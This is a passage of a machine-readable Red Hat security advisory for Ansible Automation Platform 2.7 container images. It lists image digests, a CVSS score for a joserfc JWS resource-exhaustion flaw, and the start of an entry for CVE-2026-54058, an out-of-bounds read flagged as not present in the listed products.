"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "joserfc: joserfc: Resource exhaustion via oversized JSON Web Signature (JWS) payloads"
},
{
"cve": "CVE-2026-54058",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2026-07-14T17:02:34.864708+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
